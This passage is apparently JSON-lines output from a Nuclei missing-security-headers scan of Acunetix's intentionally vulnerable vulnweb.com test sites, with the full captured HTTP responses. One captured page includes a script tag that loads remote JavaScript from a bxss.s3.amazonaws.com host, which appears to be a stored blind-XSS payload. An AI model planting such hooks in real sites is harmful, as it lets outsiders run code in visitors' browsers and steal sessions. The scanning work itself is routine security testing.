\\u003cfooter\\u003e\\n \\u003cp class=\\\"pull-left\\\"\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\n\\u003c!-- Modal --\\u003e\\n\\u003cdiv id=\\\"myModal\\\" class=\\\"modal hide fade\\\" tabindex=\\\"-1\\\" role=\\\"dialog\\\" aria-labelledby=\\\"myModalLabel\\\" aria-hidden=\\\"true\\\"\\u003e\\n \\u003cform class=\\\"modal-body\\\" action=\\\"/login\\\" method=\\\"POST\\\" id=\\\"loginForm\\\"\\u003e\\n \\u003cdiv class=\\\"modal-header\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"close\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003e×\\u003c/button\\u003e\\n \\u003ch3 id=\\\"myModalLabel\\\"\\u003eLogin\\u003c/h3\\u003e\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-body\\\"\\u003e\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Username --\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"username\\\"\\u003eUsername\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"text\\\" id=\\\"username\\\" name=\\\"username\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\" value=\\\"admin\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Password--\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"password\\\"\\u003ePassword\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"password\\\" id=\\\"password\\\" name=\\\"password\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003ca href=\\\"#\\\" class=\\\"btn\\\" id=\\\"loginFormForgot\\\"\\u003eForgot Pwd?\\u003c/a\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-footer\\\"\\u003e\\n \\u003cbutton class=\\\"btn btn-primary\\\" id=\\\"loginFormSubmit\\\"\\u003eLogin\\u003c/button\\u003e\\n \\u003cbutton class=\\\"btn\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003eClose\\u003c/button\\u003e\\n \\u003c/div\\u003e\\n \\u003c/form\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c!-- App libs --\\u003e\\n\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/libs/sessvars.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/post.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/controllers/controllers.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/services/itemsService.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://bxss.s3.amazonaws.com/ad.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:24.324501132Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46' 'http://testhtml5.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com/T\",\"path\":\"/T\",\"matched-at\":\"http://testasp.vulnweb.com/T/\",\"request\":\"GET /T HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nContent-Length: 1233\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:46 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Strict//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\\\"\\u003e\\r\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"/\\u003e\\r\\n\\u003ctitle\\u003e403 - Forbidden: Access is denied.\\u003c/title\\u003e\\r\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\r\\n\\u003c!--\\r\\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\\r\\nfieldset{padding:0 15px 10px 15px;} \\r\\nh1{font-size:2.4em;margin:0;color:#FFF;}\\r\\nh2{font-size:1.7em;margin:0;color:#CC0000;} \\r\\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \\r\\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:\\\"trebuchet MS\\\", Verdana, sans-serif;color:#FFF;\\r\\nbackground-color:#555555;}\\r\\n#content{margin:0 0 0 2%;position:relative;}\\r\\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\\r\\n--\\u003e\\r\\n\\u003c/style\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003cdiv id=\\\"header\\\"\\u003e\\u003ch1\\u003eServer Error\\u003c/h1\\u003e\\u003c/div\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n \\u003cdiv class=\\\"content-container\\\"\\u003e\\u003cfieldset\\u003e\\r\\n \\u003ch2\\u003e403 - Forbidden: Access is denied.\\u003c/h2\\u003e\\r\\n \\u003ch3\\u003eYou do not have permission to view this directory or page using the credentials that you supplied.\\u003c/h3\\u003e\\r\\n \\u003c/fieldset\\u003e\\u003c/div\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:41:24.3245676Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1' 'http://testasp.vulnweb.com/T'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testaspnet.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testaspnet.vulnweb.com\",\"matched-at\":\"http://testaspnet.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testaspnet.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 14069\\r\\nCache-Control: private\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:45 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nSet-Cookie: ASP.NET_SessionId=vmit32btaeasjnawkbexxh55; path=/; HttpOnly\\r\\nX-Aspnet-Version: 2.0.50727\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.0 Transitional//EN\\\" \\u003e\\r\\n\\u003cHTML\\u003e\\r\\n\\t\\u003cHEAD\\u003e\\r\\n\\t\\t\\u003ctitle\\u003eacublog news\\u003c/title\\u003e\\r\\n\\t\\t\\u003cMETA http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=windows-1252\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"Microsoft Visual Studio .NET 7.1\\\" name=\\\"GENERATOR\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"C#\\\" name=\\\"CODE_LANGUAGE\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"JavaScript\\\" name=\\\"vs_defaultClientScript\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"http://schemas.microsoft.com/intellisense/ie5\\\" name=\\\"vs_targetSchema\\\"\\u003e\\r\\n\\t\\t\\u003cLINK href=\\\"styles.css\\\" type=\\\"text/css\\\" rel=\\\"stylesheet\\\"\\u003e\\r\\n\\t\\u003c/HEAD\\u003e\\r\\n\\t\\u003cbody\\u003e\\r\\n\\t\\t\\u003cform name=\\\"Form1\\\" method=\\\"post\\\" action=\\\"default.aspx\\\" id=\\\"Form1\\\"\\u003e\\r\\n\\u003cdiv\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTTARGET\\\" id=\\\"__EVENTTARGET\\\" value=\\\"\\\" /\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTARGUMENT\\\" id=\\\"__EVENTARGUMENT\\\" value=\\\"\\\" /\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__VIEWSTATE\\\" id=\\\"__VIEWSTATE\\\" value=\\\"/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5\\\" /\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\r\\n\\u003cscript type=\\\"text/javascript\\\"\\u003e\\r\\n//\\u003c![CDATA[\\r\\nvar theForm = document.forms['Form1'];\\r\\nif (!theForm) {\\r\\n theForm = document.Form1;\\r\\n}\\r\\nfunction __doPostBack(eventTarget, eventArgument) {\\r\\n if (!theForm.onsubmit || (theForm.onsubmit() != false)) {\\r\\n theForm.__EVENTTARGET.value = eventTarget;\\r\\n theForm.__EVENTARGUMENT.value = eventArgument;\\r\\n theForm.submit();\\r\\n }\\r\\n}\\r\\n//]]\\u003e\\r\\n\\u003c/script\\u003e\\r\\n\\r\\n\\r\\n\\u003cdiv\\u003e\\r\\n\\r\\n\\t\\u003cinput type=\\\"hidden\\\" name=\\\"__VIEWSTATEGENERATOR\\\" id=\\\"__VIEWSTATEGENERATOR\\\" value=\\\"CA0B0334\\\" /\\u003e\\r\\n\\t\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTVALIDATION\\\" id=\\\"__EVENTVALIDATION\\\" value=\\\"/wEWVwLpus/wCAKv3NmgDwKB48+iAgK20qX9DwK20qX9DwK20tmRBwK20tmRBwK20o35BQK20o35BQK20qGcDQK20qGcDQKL+bMFAov5swUCi/mn2AkCi/mn2AkCi/nb/AICi/nb/AICi/nPkwoCi/nPkwoCi/njtgMCi/njtgMCi/mXzQwCi/mXzQwCi/mL4AUCi/mL4AUCi/m/hw0Ci/m/hw0Ci/mT7AsCi/mT7AsCi/mHgwMCi/mHgwMCvJPzxAkCvJPzxAkCvJPnmwECvJPnmwECvJObvgoCvJObvgoCvJOP1QMCvJOP1QMCvJOj6AwCvJOj6AwCvJPXjAQCvJPXjAQCvJPLow0CvJPLow0CvJP/xgYCvJP/xgYCvJPTrwMCvJPTrwMCvJPHwgwCvJPHwgwCkbrR6w8CkbrR6w8CkbrFjgcCkbrFjgcCkbr5JQKRuvklApG67fgJApG67fgJApG6gZ8BApG6gZ8BApG6tbIKApG6tbIKApG6qckDApG6qckDApG63e0MApG63e0MApG6sdUJApG6sdUJApG6pegCApG6pegCAtTZ5J4HAtTZ5J4HAtTZmDUC1NmYNQLU2YzICQLU2YzICQLU2aDvAgLU2aDvAgLU2dSDCgLU2dSDCgLU2cimAwLU2cimAwLU2fz9DALU2fz9DALU2ZCQBALU2ZCQBBM7QfLxs46Xr8rthEeGdU4fr+Ig\\\" /\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\t\\t\\t\\r\\n\\u003cTABLE id=\\\"Table1\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"5\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\u003cTR\\u003e\\r\\n\\t\\t\\u003cTD style=\\\"COLOR: #e6dccf\\\" bgColor=\\\"#806640\\\" height=\\\"75\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cIMG src=\\\"images/logo_acunetix.gif\\\" align=\\\"absMiddle\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/TD\\u003e\\r\\n\\t\\t\\u003cTD style=\\\"FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf\\\" align=\\\"right\\\" bgColor=\\\"#806640\\\"\\r\\n\\t\\t\\theight=\\\"75\\\"\\u003eTest Website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/TD\\u003e\\r\\n\\t\\u003c/TR\\u003e\\r\\n\\u003c/TABLE\\u003e\\r\\n\\u003cTABLE id=\\\"Table2\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"5\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\u003cTR\\u003e\\r\\n\\t\\t\\u003cTD class=\\\"MenuBar\\\" style=\\\"BORDER-LEFT: #806040 1px solid\\\"\\u003e\\u003cA class=\\\"menu\\\" title=\\\"About\\\" href=\\\"about.aspx\\\"\\u003eabout\\u003c/A\\u003e\\r\\n\\t\\t\\t\\u003cA class=\\\"menu\\\" title=\\\"Latest news\\\" href=\\\"default.aspx\\\"\\u003enews\\u003c/A\\u003e \\u003ca href=\\\"login.aspx\\\" id=\\\"Mainmenu2_lnkLog\\\" class=\\\"menu\\\" name=\\\"lnkLog\\\"\\u003elogin\\u003c/a\\u003e \\u003ca href=\\\"Signup.aspx\\\" id=\\\"Mainmenu2_lnkSignup\\\" class=\\\"menu\\\" name=\\\"lnkSignup\\\"\\u003e\\r\\n\\t\\t\\t\\tsignup\\u003c/a\\u003e \\u003cA class=\\\"menu\\\" title=\\\"Network scanner\\\" href=\\\"https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/\\\"\\u003enetwork scanner\\u003c/A\\u003e\\r\\n\\t\\t\\t\\t\\u003cA class=\\\"menu\\\" title=\\\"Network vuln help\\\" href=\\\"https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/\\\"\\u003enetwork vuln help\\u003c/A\\u003e\\r\\n\\t\\t\\u003c/TD\\u003e\\r\\n\\t\\t\\u003ctd class=\\\"MenuBar\\\" align=\\\"right\\\" width=\\\"50px\\\"\\u003e\\r\\n\\t\\t\\t\\u003cA href=\\\"rssFeed.aspx\\\"\\u003e\\u003cIMG src=\\\"images/rss.gif\\\" border=\\\"0\\\"\\u003e\\u003c/A\\u003e\\r\\n\\t\\t\\u003c/td\\u003e\\r\\n\\t\\u003c/TR\\u003e\\r\\n\\u003c/TABLE\\u003e\\r\\n\\r\\n\\t\\t\\t\\u003cTABLE id=\\\"Table1\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"10\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\t\\t\\t\\u003cTR\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cTD id=\\\"tdPageData\\\" valign=\\\"top\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 5/16/2019 12:32:30 PM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=0\\\" class=\\\"NewsOperation\\\"\\u003e(37) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=0\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eAcunetix Vulnerability Scanner Now With Network Security Scans\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003eSeamless OpenVAS integration now also available on Windows and Linux\\u003c/DIV\\u003e\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 11/8/2005 11:37:35 AM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=3\\\" class=\\\"NewsOperation\\\"\\u003e(37) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=3\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eAcunetix Web Vulnerability Scanner beta released!\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003e26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.\\u003c/DIV\\u003e\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 11/8/2005 11:35:22 AM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=2\\\" class=\\\"NewsOperation\\\"\\u003e(41) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=2\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eWeb attacks - can your web applications withstand the force?\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003e21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.\\u003c/DIV\\u003e\\u003c/TD\\u003e\\r\\n\\r\\n\\t\\t\\t\\t\\t\\u003cTD vAlign=\\\"top\\\" width=\\\"200\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\t\\u003ctable id=\\\"RightPanel1_Calendar\\\" class=\\\"Calendar\\\" cellspacing=\\\"0\\\" cellpadding=\\\"1\\\" title=\\\"Calendar\\\" border=\\\"0\\\" style=\\\"background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;\\\"\\u003e\\r\\n\\t\\u003ctr\\u003e\\u003ctd colspan=\\\"7\\\" style=\\\"background-color:#E6B873;\\\"\\u003e\\u003ctable class=\\\"Calendar\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;\\\"\\u003e\\r\\n\\t\\t\\u003ctr\\u003e\\u003ctd style=\\\"width:15%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','V9040')\\\" style=\\\"color:Black\\\" title=\\\"Go to the previous month\\\"\\u003e\\u0026lt;\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:70%;\\\"\\u003eNovember 2024\\u003c/td\\u003e\\u003ctd align=\\\"right\\\" style=\\\"width:15%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','V9101')\\\" style=\\\"color:Black\\\" title=\\\"Go to the next month\\\"\\u003e\\u0026gt;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\t\\u003c/table\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Sunday\\\" scope=\\\"col\\\"\\u003eSun\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Monday\\\" scope=\\\"col\\\"\\u003eMon\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Tuesday\\\" scope=\\\"col\\\"\\u003eTue\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Wednesday\\\" scope=\\\"col\\\"\\u003eWed\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Thursday\\\" scope=\\\"col\\\"\\u003eThu\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Friday\\\" scope=\\\"col\\\"\\u003eFri\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Saturday\\\" scope=\\\"col\\\"\\u003eSat\\u003c/th\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9066')\\\" style=\\\"color:Black\\\" title=\\\"October 27\\\"\\u003e27\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9067')\\\" style=\\\"color:Black\\\" title=\\\"October 28\\\"\\u003e28\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9068')\\\" style=\\\"color:Black\\\" title=\\\"October 29\\\"\\u003e29\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9069')\\\" style=\\\"color:Black\\\" title=\\\"October 30\\\"\\u003e30\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9070')\\\" style=\\\"color:Black\\\" title=\\\"October 31\\\"\\u003e31\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9071')\\\" style=\\\"color:Black\\\" title=\\\"November 01\\\"\\u003e1\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9072')\\\" style=\\\"color:Black\\\" title=\\\"November 02\\\"\\u003e2\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9073')\\\" style=\\\"color:Black\\\" title=\\\"November 03\\\"\\u003e3\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9074')\\\" style=\\\"color:Black\\\" title=\\\"November 04\\\"\\u003e4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9075')\\\" style=\\\"color:Black\\\" title=\\\"November 05\\\"\\u003e5\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9076')\\\" style=\\\"color:Black\\\" title=\\\"November 06\\\"\\u003e6\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9077')\\\" style=\\\"color:Black\\\" title=\\\"November 07\\\"\\u003e7\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9078')\\\" style=\\\"color:Black\\\" title=\\\"November 08\\\"\\u003e8\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9079')\\\" style=\\\"color:Black\\\" title=\\\"November 09\\\"\\u003e9\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9080')\\\" style=\\\"color:Black\\\" title=\\\"November 10\\\"\\u003e10\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9081')\\\" style=\\\"color:Black\\\" title=\\\"November 11\\\"\\u003e11\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9082')\\\" style=\\\"color:Black\\\" title=\\\"November 12\\\"\\u003e12\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"border-color:#806640;width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9083')\\\" style=\\\"color:Black\\\" title=\\\"November 13\\\"\\u003e13\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9084')\\\" style=\\\"color:Black\\\" title=\\\"November 14\\\"\\u003e14\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9085')\\\" style=\\\"color:Black\\\" title=\\\"November 15\\\"\\u003e15\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9086')\\\" style=\\\"color:Black\\\" title=\\\"November 16\\\"\\u003e16\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9087')\\\" style=\\\"color:Black\\\" title=\\\"November 17\\\"\\u003e17\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" 